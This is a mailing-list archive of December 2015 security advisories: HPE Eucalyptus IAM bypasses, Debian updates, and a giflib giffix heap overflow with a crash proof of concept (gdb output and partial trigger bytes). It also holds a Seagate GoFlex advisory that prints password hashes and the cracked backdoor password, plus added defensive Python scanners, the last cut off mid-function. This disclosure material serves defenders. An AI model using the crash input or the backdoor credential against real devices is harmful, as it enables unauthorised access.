[security bulletin] HPSBGN03527 rev.1 - HPE Helion Eucalyptus, Remote Access Restriction Bypass

2015-12-21 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04926482

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04926482
Version: 1

HPSBGN03527 rev.1 - HPE Helion Eucalyptus, Remote Access Restriction Bypass

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2015-12-21
Last Updated: 2015-12-21

Potential Security Impact: Remote Access Restriction Bypass, Increase in
Privilege

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HPE Helion
Eucalyptus. The vulnerability could be exploited to bypass access permissions
by a remote authenticated user.

Notes:

  - In Eucalyptus, following the AWS model, IAM roles are used to temporarily
allow users or services to access resources within or across accounts. Access
to roles is determined by the role's trust policy and a set of user
permissions. The trust policy is associated with a role and defines which
accounts or services are allowed to assume the role. User permissions are
defined by the policy associated with the user, and define a set of actions
and resources that the user is allowed to access.

  - An issue has been identified in how Eucalyptus checks user permissions
when allowing a user to assume a role. Given that the grant policy allows the
user's account to assume the role, any user in that account would be able to
assume the role, even if the user's policy does not explicitly grant the
AssumeRole permission for the role. As a result, in some cases authenticated
users could gain privileges by assuming an IAM role that they were not
intended to have access to. The impact is mitigated by the fact that the
role's trust policy still has to explicitly authorize the user's account to
access the role.

References:

  CVE-2015-6861
  PSRT102965

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HPE Helion Eucalyptus 3.4.0 to 4.2.0

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference      Base Vector                   Base Score
  CVE-2015-6861  (AV:N/AC:H/Au:S/C:P/I:P/A:P)  4.6
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HPE has made the following software updates available to resolve the
vulnerability.

  - HPE Helion Eucalyptus 4.2.1

  Instructions for downloading and upgrading to the latest HPE Helion
Eucalyptus software are available at the following location:

  http://www8.hp.com/us/en/cloud/helion-eucalyptus-downloads.html

HISTORY
Version:1 (rev.1) - 21 December 2015 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hpe.com.

Report: To report a potential security vulnerability with any HPE supported
product, send Email to: security-al...@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2015 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be trademarks of their respective owners.
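
The bulletin's note describes a two-sided check (the role's trust policy must name the caller's account, and the caller's own policy must grant AssumeRole on the role) of which Eucalyptus enforced only the first half. The following Python model is an added illustration, not Eucalyptus code: the policy documents use the AWS/Eucalyptus IAM JSON shape, but the account ID, the ARNs, the two user policies and both evaluation functions are constructed here, and Principal conditions, NotAction and other principal types are not modelled.

```python
"""Model of the two-sided AssumeRole authorization check that HPSBGN03527
(CVE-2015-6861) says Eucalyptus got wrong.  Added example, not Eucalyptus
code: the policy documents use the AWS/Eucalyptus IAM JSON shape, but the
account ID, the ARNs and both evaluation functions are constructed here."""
import fnmatch
import json

ACCOUNT = "123456789012"
ROLE_ARN = "arn:aws:iam::%s:role/admin-ops" % ACCOUNT

# Trust policy on the role: delegates to the whole trusted account (root principal).
TRUST_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [{"Effect": "Allow",
                 "Principal": {"AWS": "arn:aws:iam::123456789012:root"},
                 "Action": "sts:AssumeRole"}]
}""")
# Two users in that account: only "ops" is granted sts:AssumeRole on the role.
OPS_USER_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [{"Effect": "Allow", "Action": "sts:AssumeRole",
                 "Resource": "arn:aws:iam::123456789012:role/admin-*"}]
}""")
INTERN_USER_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [{"Effect": "Allow", "Action": "s3:ListBucket", "Resource": "*"}]
}""")


def _as_list(value):
    return value if isinstance(value, list) else [value]


def trust_allows_account(trust_policy, account_id):
    """Does the role's trust policy delegate sts:AssumeRole to this account?
    (Principal conditions and other principal types are not modelled.)"""
    root = "arn:aws:iam::%s:root" % account_id
    for st in trust_policy["Statement"]:
        principals = _as_list(st.get("Principal", {}).get("AWS", []))
        actions = _as_list(st.get("Action", []))
        if st.get("Effect") == "Allow" and "sts:AssumeRole" in actions \
                and (root in principals or "*" in principals):
            return True
    return False


def user_policy_allows(user_policy, action, resource):
    """IAM-style evaluation of the caller's own policy: an explicit Deny wins,
    otherwise some Allow must match both Action and Resource (shell wildcards)."""
    allowed = False
    for st in user_policy["Statement"]:
        if not any(fnmatch.fnmatchcase(action, p) for p in _as_list(st.get("Action", []))):
            continue
        if not any(fnmatch.fnmatchcase(resource, p) for p in _as_list(st.get("Resource", []))):
            continue
        if st.get("Effect") == "Deny":
            return False
        if st.get("Effect") == "Allow":
            allowed = True
    return allowed


def can_assume_vulnerable(account_id, user_policy, role_arn, trust_policy):
    """The behaviour the bulletin describes: only the trust policy is consulted,
    so any user in a trusted account can assume the role."""
    return trust_allows_account(trust_policy, account_id)


def can_assume_fixed(account_id, user_policy, role_arn, trust_policy):
    """Both sides must agree: the role trusts the caller's account AND the
    caller's own policy grants sts:AssumeRole on that role's ARN."""
    return (trust_allows_account(trust_policy, account_id)
            and user_policy_allows(user_policy, "sts:AssumeRole", role_arn))


if __name__ == "__main__":
    for user, policy in (("ops", OPS_USER_POLICY), ("intern", INTERN_USER_POLICY)):
        print("%-6s vulnerable=%-5s fixed=%s" % (
            user, can_assume_vulnerable(ACCOUNT, policy, ROLE_ARN, TRUST_POLICY),
            can_assume_fixed(ACCOUNT, policy, ROLE_ARN, TRUST_POLICY)))
```

Run stand-alone it prints that the "intern" user, who has no sts:AssumeRole grant at all, passes the trust-only check and fails the combined one; that difference is the privilege gain the bulletin describes, and the trust policy naming the account is why the exposure is limited to users inside accounts the role already trusts.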


[SECURITY] [DSA 3429-1] foomatic-filters security update

2015-12-21 Thread Salvatore Bonaccorso
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-3429-1   secur...@debian.org
https://www.debian.org/security/ Salvatore Bonaccorso
December 21, 2015 https://www.debian.org/security/faq
- -

Package: foomatic-filters
CVE ID : CVE-2015-8327 CVE-2015-8560
Debian Bug : 806886 807993

Michal Kowalczyk and Adam Chester discovered that missing input
sanitising in the foomatic-rip print filter might result in the
execution of arbitrary commands.

For the oldstable distribution (wheezy), these problems have been fixed
in version 4.0.17-1+deb7u1.

For the stable distribution (jessie), these problems have been fixed in
version 4.0.17-5+deb8u1.

For the unstable distribution (sid), these problems have been fixed in
version 4.0.17-7.

We recommend that you upgrade your foomatic-filters packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[security bulletin] HPSBGN03526 rev.1 - HPE Helion Eucalyptus, Remote Access Restriction Bypass, Unauthorized Modification

2015-12-21 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04926463

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04926463
Version: 1

HPSBGN03526 rev.1 - HPE Helion Eucalyptus, Remote Access Restriction Bypass,
Unauthorized Modification

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2015-12-21
Last Updated: 2015-12-21

Potential Security Impact: Remote Access Restriction Bypass, Unauthorized
Modification

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HPE Helion
Eucalyptus. The vulnerability could be exploited to bypass access permissions
by a remote authenticated user resulting in unauthorized modification.

Note:

  This is an update to the Eucalyptus security advisory for 4.1.1 and earlier
previously published at:

  https://www.eucalyptus.com/resources/security/advisories/esa-32

  This bulletin applies to that advisory but now includes HPE Helion
Eucalyptus v4.2.0 for this vulnerability also.

References:

  CVE-2014-5040
  PSRT102966

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Helion Eucalyptus v4.1.1 and earlier, v4.2.0

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference      Base Vector                   Base Score
  CVE-2014-5040  (AV:N/AC:H/Au:S/C:P/I:P/A:P)  4.6
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HPE has made the following software updates available to resolve the
vulnerability.

  - HPE Helion Eucalyptus 4.2.1
  - HPE Helion Eucalyptus 4.1.2

  Instructions for downloading and upgrading to the latest HPE Helion
Eucalyptus software are available at the following location:

  http://www8.hp.com/us/en/cloud/helion-eucalyptus-downloads.html

HISTORY
Version:1 (rev.1) - 21 December 2015 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hpe.com.

Report: To report a potential security vulnerability with any HPE supported
product, send Email to: security-al...@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2015 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be trademarks of their respective owners.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBAgAGBQJWeDrZAAoJEGIGBBYqRO9/bVUH/i4dyZ2slET0ddg5mSPHNIND
zO/3a1vP6UZQD+C+ti34+fNdcQnwpDbxMp/d5AAWT3aAQvb2JBeqJTvnM1+nF9lz
BCkQ4zuisa9jh21kqWqwFJBvRcw54iPuCu5QUAZPDJb7ZhTjZISDJF4LKiqghCzN
LU24inhngRcZhMxIVC1x5ZRUB+0RrnCSbsbEmJPhwOG9DwCSpSljv+ZG+Iq5tT2T
cSjjB0NUjWmi/2fQdTEZ6kjZxDxJ1GHP11VhivwiUddAT++te4VZdAyGvGgdqiKk
Fhj1Zt7l6TBrTK4vPv1fUodnCPHZDt0FkKChmepuUaL7HekA5uFyeeZiukGWg/I=
=RlAC
-END PGP SIGNATURE-


giflib: heap overflow in giffix (CVE-2015-7555)

2015-12-21 Thread Hans Jerry Illikainen

About
=====

giflib[1] is a library for working with GIF images.  It also provides
several command-line utilities.


CVE-2015-7555
=============

A heap overflow may occur in the giffix utility included in giflib-5.1.1
when processing records of the type `IMAGE_DESC_RECORD_TYPE' due to the
allocated size of `LineBuffer' equaling the value of the logical screen
width, `GifFileIn->SWidth', while subsequently having
`GifFileIn->Image.Width' bytes of data written to it.


giflib-5.1.1/util/giffix.c #35..194:
,
| int main(int argc, char **argv)
| {
|     [...]
|     if ((LineBuffer = (GifRowType) malloc(GifFileIn->SWidth)) == NULL)
|         GIF_EXIT("Failed to allocate memory required, aborted.");
|
|     /* Scan the content of the GIF file and load the image(s) in: */
|     do {
|         [...]
|         switch (RecordType) {
|         case IMAGE_DESC_RECORD_TYPE:
|             if (DGifGetImageDesc(GifFileIn) == GIF_ERROR)
|                 QuitGifError(GifFileIn, GifFileOut);
|             [...]
|             Width = GifFileIn->Image.Width;
|             Height = GifFileIn->Image.Height;
|             [...]
|             /* Find the darkest color in color map to use as a filler. */
|             ColorMap = (GifFileIn->Image.ColorMap ? GifFileIn->Image.ColorMap :
|                         GifFileIn->SColorMap);
|             for (i = 0; i < ColorMap->ColorCount; i++) {
|                 j = ((int) ColorMap->Colors[i].Red) * 30 +
|                     ((int) ColorMap->Colors[i].Green) * 59 +
|                     ((int) ColorMap->Colors[i].Blue) * 11;
|                 if (j < ColorIntens) {
|                     ColorIntens = j;
|                     DarkestColor = i;
|                 }
|             }
|
|             /* Load the image, and dump it. */
|             for (i = 0; i < Height; i++) {
|                 GifQprintf("\b\b\b\b%-4d", i);
|                 if (DGifGetLine(GifFileIn, LineBuffer, Width)
|                     == GIF_ERROR) break;
|                 if (EGifPutLine(GifFileOut, LineBuffer, Width)
|                     == GIF_ERROR) QuitGifError(GifFileIn, GifFileOut);
|             }
|
|             if (i < Height) {
|                 [...]
|                 /* Fill in with the darkest color in color map. */
|                 for (j = 0; j < Width; j++)
|                     LineBuffer[j] = DarkestColor;
|                 for (; i < Height; i++)
|                     if (EGifPutLine(GifFileOut, LineBuffer, Width)
|                         == GIF_ERROR) QuitGifError(GifFileIn, GifFileOut);
|             }
|             break;
|         [...]
|         }
|     }
|     while (RecordType != TERMINATE_RECORD_TYPE);
|     [...]
| }
`

,
| $ gdb -q --args ./giffix heap.gif
| Reading symbols from ./giffix...done.
| (gdb) b util/giffix.c:94
| Breakpoint 1 at 0x401131: file giffix.c, line 94.
| (gdb) b util/giffix.c:148
| Breakpoint 2 at 0x401449: file giffix.c, line 148.
| (gdb) b util/giffix.c:149
| Breakpoint 3 at 0x401452: file giffix.c, line 149.
| 
| (gdb) commands 3
| Type commands for breakpoint(s) 3, one per line.
| End with a line saying just "end".
| >printf "%p, 0x%02x\n", LineBuffer+j, DarkestColor
| >c
| >end
| 
| (gdb) r
| [...]
| Breakpoint 1, main (argc=2, argv=0x7fffe6b8) at giffix.c:94
| 94  if ((LineBuffer = (GifRowType) malloc(GifFileIn->SWidth)) == NULL)
| 
| (gdb) p GifFileIn->SWidth
| $1 = 1
| 
| (gdb) c
| [...]
| Breakpoint 2, main (argc=2, argv=0x7fffe6b8) at giffix.c:148
| 148 for (j = 0; j < Width; j++)
| 
| (gdb) p Width
| $2 = 255
| 
| (gdb) c
| Continuing.
| 
| Breakpoint 3, main (argc=2, argv=0x7fffe6b8) at giffix.c:149
| 149 LineBuffer[j] = DarkestColor;
| 0x618920, 0x01
| 
| [...]
| 
| Breakpoint 3, main (argc=2, argv=0x7fffe6b8) at giffix.c:149
| 149 LineBuffer[j] = DarkestColor;
| 0x618940, 0x01
| 
| [...]
| 
| Breakpoint 3, main (argc=2, argv=0x7fffe6b8) at giffix.c:149
| 149 LineBuffer[j] = DarkestColor;
| 0x618a1e, 0x01
| 
| Program received signal SIGSEGV, Segmentation fault.
| 0x77bd8658 in GifFreeMapObject (Object=0x101010101010101) at gifalloc.c:80
| 80  (void)free(Object->Colors);
`


heap.gif:
,
| unsigned char heap[] = {
| /* GIF87a */
| 0x47, 0x49, 0x46, 0x38, 0x37, 0x61,
| 
| /* DGifGetScreenDesc() */
| 0x01, 0x00, /* GifFile->SWidth */
| 0x01, 0x00, /* GifFile->SHeight */
| 0x80,   /* ColorCount = 1 << ((this & 0x07) + 1) */
| 0x00,   /* GifFile->SBackGroundColor */
| 0x00,   /* GifFile->AspectByte */
| 0x11, 0x11, 0x11,   /* GifFile->SColorMap->Colors[0] */
| 0x00, 0x00, 0x00,   /* GifFile->SColorMap->Colors[1] */
| 
| /* DGifGetRecordType() */
| 0x2c,   
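
The trigger condition above is a structural one (an image descriptor wider than the logical screen), so it can be detected before any decoder touches the file. The following scanner is an added example, not giflib code and not from the advisory: it walks the GIF block structure and reports image descriptors whose Image.Width exceeds SWidth. The heap.gif listing above is cut off, so the sample bytes here are constructed to the same layout (SWidth = 1, Image.Width = 255, a 2-entry global colour table); the benign sample and all function names are mine. One fix for giffix itself is the obvious one: size LineBuffer by the larger of SWidth and the per-image width, or reject descriptors that do not fit the screen.

```python
"""Scanner for the CVE-2015-7555 trigger condition in GIF files.  Added
example, not giflib code: it walks the GIF block structure and reports image
descriptors whose Image.Width exceeds the logical screen width SWidth, the
mismatch that makes giffix write past its SWidth-byte LineBuffer.  The sample
GIFs are constructed here to the layout of the advisory's heap.gif."""
import struct


def _color_table_len(packed):
    # Bit 7 of the packed byte: a colour table follows; bits 0-2: its size,
    # 2^(size+1) RGB triplets.  Same fields DGifGetScreenDesc/DGifGetImageDesc read.
    return 3 * (1 << ((packed & 0x07) + 1)) if packed & 0x80 else 0


def _skip_sub_blocks(data, pos):
    """Advance over length-prefixed data sub-blocks up to the 0-length terminator."""
    while True:
        if pos >= len(data):
            raise ValueError("truncated sub-block chain")
        n = data[pos]
        pos += 1 + n
        if n == 0:
            return pos


def scan_gif(data):
    """Return (SWidth, SHeight, findings).  Each finding describes one image
    descriptor that does not fit the logical screen."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    swidth, sheight, packed = struct.unpack_from("<HHB", data, 6)
    pos = 13 + _color_table_len(packed)   # header(6) + screen descriptor(7) + GCT
    findings, index = [], 0
    while pos < len(data):
        rec, pos = data[pos], pos + 1
        if rec == 0x3B:                    # trailer
            break
        if rec == 0x21:                    # extension: label byte, then sub-blocks
            pos = _skip_sub_blocks(data, pos + 1)
        elif rec == 0x2C:                  # image descriptor
            if len(data) < pos + 9:
                raise ValueError("truncated image descriptor")
            left, top, width, height, ipacked = struct.unpack_from("<HHHHB", data, pos)
            pos += 9 + _color_table_len(ipacked)
            pos = _skip_sub_blocks(data, pos + 1)   # LZW min code size, then data
            problems = []
            if width > swidth:
                problems.append("Image.Width %d > SWidth %d: giffix LineBuffer overflow" % (width, swidth))
            if left + width > swidth or top + height > sheight:
                problems.append("image extends outside the logical screen")
            if problems:
                findings.append({"image": index, "left": left, "top": top,
                                 "width": width, "height": height, "problems": problems})
            index += 1
        else:
            raise ValueError("unknown record type 0x%02x at offset %d" % (rec, pos - 1))
    return swidth, sheight, findings


def build_gif(swidth, sheight, img_width, img_height):
    """Constructed one-frame GIF87a with a 2-entry global colour table."""
    head = b"GIF87a" + struct.pack("<HHBBB", swidth, sheight, 0x80, 0, 0)
    gct = b"\x11\x11\x11" + b"\x00\x00\x00"
    desc = b"\x2c" + struct.pack("<HHHHB", 0, 0, img_width, img_height, 0)
    lzw = b"\x02" + b"\x02\x4c\x01" + b"\x00"       # min code size, one sub-block, end
    return head + gct + desc + lzw + b"\x3b"


HEAP_GIF = build_gif(1, 1, 255, 1)     # SWidth 1 but a 255-wide image, as in heap.gif
BENIGN_GIF = build_gif(4, 4, 4, 4)

if __name__ == "__main__":
    for name, blob in (("heap.gif", HEAP_GIF), ("benign.gif", BENIGN_GIF)):
        print(name, scan_gif(blob))
```

The scanner never decodes LZW data, so it is cheap enough to run over a whole corpus of samples; it also reports frames whose Left/Top offsets push them past the screen, which the same LineBuffer sizing in giffix does not account for either.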

[SECURITY] [DSA 3427-1] blueman security update

2015-12-21 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-3427-1   secur...@debian.org
https://www.debian.org/security/   Moritz Muehlenhoff
December 18, 2015 https://www.debian.org/security/faq
- -

Package: blueman
CVE ID : not yet available

It was discovered that the Mechanism plugin of Blueman, a graphical
Bluetooth manager, allows local privilege escalation.

For the oldstable distribution (wheezy), this problem has been fixed
in version 1.23-1+deb7u1.

For the stable distribution (jessie), this problem has been fixed in
version 1.99~alpha1-1+deb8u1.

For the unstable distribution (sid), this problem will be fixed soon.

We recommend that you upgrade your blueman packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBAgAGBQJWdHTKAAoJEBDCk7bDfE42SXUQAK7gTqLDAT+FWNuZMySGutx7
Rte1scauuNirikqR3Gohpm9gYWJj6Rv89EYJE5X/e2nU1LIMybAvZfT3tk7LAEMd
VcwaOwYu7jsve4OwTtJnAq0pkE7Bumyor9FMFqrlQdCrqUGp+NgzdCkDoetKNr3G
tgJxSuYB4B3+i6nx8+gj+5K1pzuxrlOW+k/wLM4ZC5VLwXjH//97TMglfF/5IMX9
jb+7LPU60YjPogVH4Fm3+F0fsN70O0mdCtuAmeORbkfzpBJd3DTIvB+ZPabr5keY
7mGqul5o4D5V15xFU/OTCiq/qS+RTRjjx5cJYGkn863qC7D3h8ddQyoiUXjD4dai
fcOvqWn3RYj53OWTpDCIspDXVbZ0JVUAg3LeJMkOVelXYBFVCbNzZXLO1wqJub+l
bnZ9jbmSLdcLhS7CsU3c7DhwXlYlqdRf/t7/7jg1IJux/5ztXy0IKat3qoPYuAuU
3OnJDg7AsgZgVTFI+P3H3h3CKmddrcLCRUo/I4/6ChpexrQlhiKk8JDWxNX8T0Cn
ZIDd8GNIhY7iblCDHrBM3uE8ROkQfQaajPDN6f2+If0SLLqh7SwhVdSGLQNGBbtG
OHYL7h0cvjHgcsf1NmbiF4qDtjifnbZGftZ15g5EfhjDMtnQ1h10KTEaRcJTcSf6
3aePyVM3Ws5U4yR/Z+kN
=aL4m
-END PGP SIGNATURE-



KL-001-2015-007 : Seagate GoFlex Satellite Remote Telnet Default Password

2015-12-21 Thread KoreLogic Disclosures
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

KL-001-2015-007 : Seagate GoFlex Satellite Remote Telnet Default Password

Title: Seagate GoFlex Satellite Remote Telnet Default Password
Advisory ID: KL-001-2015-007
Publication Date: 2015.12.18
Publication URL: 
https://www.korelogic.com/Resources/Advisories/KL-001-2015-007.txt


1. Vulnerability Details

 Affected Vendor: Seagate
 Affected Product: GoFlex Satellite
 Affected Version: 1.3.7
 Platform: Embedded Linux
 CWE Classification: CWE-288: Authentication Bypass Using an
 Alternate Path or Channel; CWE-798: Use of Hard-coded Credentials
 Impact: Remote Administration
 Attack vector: Telnet
 CVE-ID: CVE-2015-2874

2. Vulnerability Description

 Seagate GoFlex Satellite Mobile Wireless Storage devices
 contain a hardcoded backdoor account. An attacker could use
 this account to remotely tamper with the underlying operating
 system when Telnet is enabled.

3. Technical Description

 root@wpad:/tmp/jfroot# ls
 bin  boot  dev  etc  home  include  lib  linuxrc  media  mnt  proc
 satellite_app  sbin  share  srv  static  sys  tmp  usr  var
 root@wpad:/tmp/jfroot# cd etc
 root@wpad:/tmp/jfroot/etc# ls
 angstrom-version  default  fstab  init.d  iproute2  motd  org_passwd  protocols  rc4.d  rS.d  terminfo  udhcpc.d
 autoUpdURL  device_table  group  inittab  issue  mtab  passwd  rc0.d  rc5.d  scsi_id.config  timestamp  udhcpd.conf
 avahi  device_table-opkg  host.conf  inputrc  issue.net  network  passwd-  rc1.d  rc6.d  services  tinylogin.links  udhcpd_factory.conf
 busybox.links  fb.modes  hostname  internal_if.conf  localtime  nsswitch.conf  profile  rc2.d  rcS.d  skel  ts.conf  version
 dbus-1  filesystems  hosts  ipkg  mke2fs.conf  opkg  profile.d  rc3.d  rpc  syslog.conf  udev
 root@wpad:/tmp/jfroot/etc# cat passwd
 root:VruSTav0/g/yg:0:0:root:/home/root:/bin/sh
 daemon:*:1:1:daemon:/usr/sbin:/bin/sh
 bin:*:2:2:bin:/bin:/bin/sh
 sys:*:3:3:sys:/dev:/bin/sh
 sync:*:4:65534:sync:/bin:/bin/sync
 games:*:5:60:games:/usr/games:/bin/sh
 man:*:6:12:man:/var/cache/man:/bin/sh
 lp:*:7:7:lp:/var/spool/lpd:/bin/sh
 mail:*:8:8:mail:/var/mail:/bin/sh
 news:*:9:9:news:/var/spool/news:/bin/sh
 uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
 proxy:*:13:13:proxy:/bin:/bin/sh
 www-data:*:33:33:www-data:/var/www:/bin/sh
 backup:*:34:34:backup:/var/backups:/bin/sh
 list:*:38:38:Mailing List Manager:/var/list:/bin/sh
 irc:*:39:39:ircd:/var/run/ircd:/bin/sh
 gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
 nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
 xoFaeS:QGd9zEjQYxxf2:500:500:Linux User,,,:/home/xoFaeS:/bin/sh

 The xoFaeS user cracked to etagknil.

4. Mitigation and Remediation Recommendation

 The vendor has released a patch that can be
 obtained using the Download Finder located at
 https://apps1.seagate.com/downloads/request.html

5. Credit

 This vulnerability was discovered by Matt Bergin (@thatguylevel)
 of KoreLogic, Inc.

6. Disclosure Timeline

 2015.09.11 - Vulnerability details and PoC sent to Seagate.
 2015.09.15 - Seagate confirms receipt.
 2015.09.28 - Seagate indicates a patch is ready but not yet available to
  the public.
 2015.09.28 - KoreLogic asks Seagate if they have obtained a CVE-ID for
  the vulnerability.
 2015.10.27 - Seagate notifies KoreLogic that the patch is publicly
  available. Seagate indicates they are waiting for a CVE
  before releasing a security advisory.
 2015.12.08 - KoreLogic requests an update on the CVE-ID and associated
  Seagate advisory.
 2015.12.08 - Seagate responds with a link to
  http://www.kb.cert.org/vuls/id/903500
 2015.12.18 - Public disclosure.

7. Proof of Concept

 N/A

The contents of this advisory are copyright(c) 2015
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and 
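
The passwd listing above is the whole technical finding: two accounts carry real (13-character, traditional DES crypt) hashes and a login shell, and one of them is the undocumented xoFaeS account. When triaging an extracted firmware root filesystem the same question is worth automating. The following is an added example, not KoreLogic's tooling: it parses passwd(5) records, drops locked or shadowed entries and non-login shells, classifies the hash scheme, and emits user:hash lines for an offline cracker. SAMPLE_PASSWD is a constructed excerpt in the shape of the advisory's listing; it does not verify the cracked password the advisory reports.

```python
"""Triage check for the class of finding in KL-001-2015-007: given a passwd
file lifted from an extracted firmware root filesystem, list the accounts that
can actually log in over a service like telnet (usable password hash and an
interactive shell) and flag legacy DES-crypt hashes, which fall to offline
cracking quickly.  Added example, not KoreLogic's tooling; SAMPLE_PASSWD is a
constructed excerpt in the shape of the advisory's listing."""

SAMPLE_PASSWD = """\
root:VruSTav0/g/yg:0:0:root:/home/root:/bin/sh
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
sync:*:4:65534:sync:/bin:/bin/sync
www-data:*:33:33:www-data:/var/www:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
xoFaeS:QGd9zEjQYxxf2:500:500:Linux User,,,:/home/xoFaeS:/bin/sh
"""

# Password fields that cannot authenticate on their own.  "x" means the hash
# lives in /etc/shadow, so on a shadowed image merge that file before judging.
UNUSABLE = {"", "*", "!", "!!", "x", "*LK*", "*NP*"}
NOLOGIN_SHELLS = {"/bin/false", "/sbin/nologin", "/usr/sbin/nologin", "/bin/sync"}
MODULAR_CRYPT = {"1": "md5-crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
                 "5": "sha256-crypt", "6": "sha512-crypt", "y": "yescrypt"}


def hash_kind(field):
    """Classify a passwd/shadow password field by its hash scheme."""
    if field in UNUSABLE or field.startswith(("!", "*")):
        return "unusable"
    if field.startswith("$"):
        scheme = field.split("$")[1]
        return MODULAR_CRYPT.get(scheme, "crypt-$" + scheme)
    if len(field) == 13:           # 2-char salt + 11-char hash: traditional DES crypt
        return "des-crypt"
    return "unknown"


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; raises on malformed records."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError("line %d: expected 7 fields, got %d" % (lineno, len(fields)))
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "hash": pw, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return entries


def loginable_accounts(text):
    """Accounts with a usable hash and an interactive shell, annotated with the
    hash scheme, whether it is weak, and whether the account is uid 0."""
    found = []
    for e in parse_passwd(text):
        kind = hash_kind(e["hash"])
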